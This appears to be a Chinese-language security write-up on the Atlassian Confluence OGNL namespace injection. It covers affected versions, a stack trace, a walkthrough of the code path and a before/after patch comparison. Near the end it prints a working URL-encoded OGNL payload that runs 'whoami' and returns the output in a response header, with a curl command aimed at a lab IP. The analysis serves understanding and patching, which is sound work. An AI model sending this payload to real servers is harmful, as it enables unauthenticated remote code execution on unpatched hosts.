漏洞信息

受影响版本

• 1.3.0 <= Confluence Server and Data Center < 7.4.17
• 7.13.0 <= Confluence Server and Data Center < 7.13.7
• 7.14.0 <= Confluence Server and Data Center < 7.14.3
• 7.15.0 <= Confluence Server and Data Center < 7.15.2
• 7.16.0 <= Confluence Server and Data Center < 7.16.4
• 7.17.0 <= Confluence Server and Data Center < 7.17.4
• 7.18.0 <= Confluence Server and Data Center < 7.18.1

不受影响版本

• Confluence Server and Data Center 7.4.17
• Confluence Server and Data Center 7.13.7
• Confluence Server and Data Center 7.14.3
• Confluence Server and Data Center 7.15.2
• Confluence Server and Data Center 7.16.4
• Confluence Server and Data Center 7.17.4
• Confluence Server and Data Center 7.18.1

经测试 Atlassian Confluence 6.7.1也受到影响

漏洞分析

根据调用堆栈

at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)
at ognl.SimpleNode.getValue(SimpleNode.java:193)
at ognl.Ognl.getValue(Ognl.java:333)
at ognl.Ognl.getValue(Ognl.java:310)A
at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)
at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)
at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)
at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)
at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)
at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)
at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)
at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)
at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)

我们从com.opensymphony.webwork.dispatcher.ServletDispatcher.service开始分析

然后跟进getNameSpace函数

这里最终返回了/${4*4}

然后继续跟进serviceAction

这里经过处理之后出来继续进入proxy.execute();

进入之后经过invoke()处理

然后进入到invoke，这里会不断地循环

这个循环中会进入不同的invoke方法，其中最重要的就是返回 notpermitted 并赋值给 resultCode。

最终进入下面的

继续跟进execute

这里传入的参数就是我们刚才赋值的namespace

然后进入这里

这里就比较明朗了

最终在这里执行了任意代码。

总结

这个漏洞于CVE-2018-11776很相似。也是命民空间的OGNL注入漏洞

补丁对比

前

public void execute(ActionInvocation invocation) throws Exception {
    if (this.namespace == null)
        this.namespace = invocation.getProxy().getNamespace(); 
    OgnlValueStack stack = ActionContext.getContext().getValueStack();
    String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);
    String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);

后

  public void execute(ActionInvocation invocation) throws Exception {
    if (this.namespace == null)
      this.namespace = invocation.getProxy().getNamespace(); 
    String finalNamespace = this.namespace;
    String finalActionName = this.actionName;

同时，Atlassian也添加了SafeExpressionUtil.class对不安全的表达式进行过滤

并在findValue函数运行时进行检查。

/%24%7B%28%23a%3D%40org%2Eapache%2Ecommons%2Eio%2EIOUtils%40toString%28%40java%2Elang%2ERuntime%40getRuntime%28%29%2Eexec%28%22whoami%22%29%2EgetInputStream%28%29%2C%22utf%2D8%22%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsetHeader%28%22X%2DCmd%2DResponse%22%2C%23a%29%29%7D/

curl -v http://192.168.44.163:8090/%24%7B%28%23a%3D%40org%2Eapache%2Ecommons%2Eio%2EIOUtils%40toString%28%40java%2Elang%2ERuntime%40getRuntime%28%29%2Eexec%28%22whoami%22%29%2EgetInputStream%28%29%2C%22utf%2D8%22%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsetHeader%28%22X%2DCmd%2DResponse%22%2C%23a%29%29%7D/

参考

https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/

https://xz.aliyun.com/t/11436

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html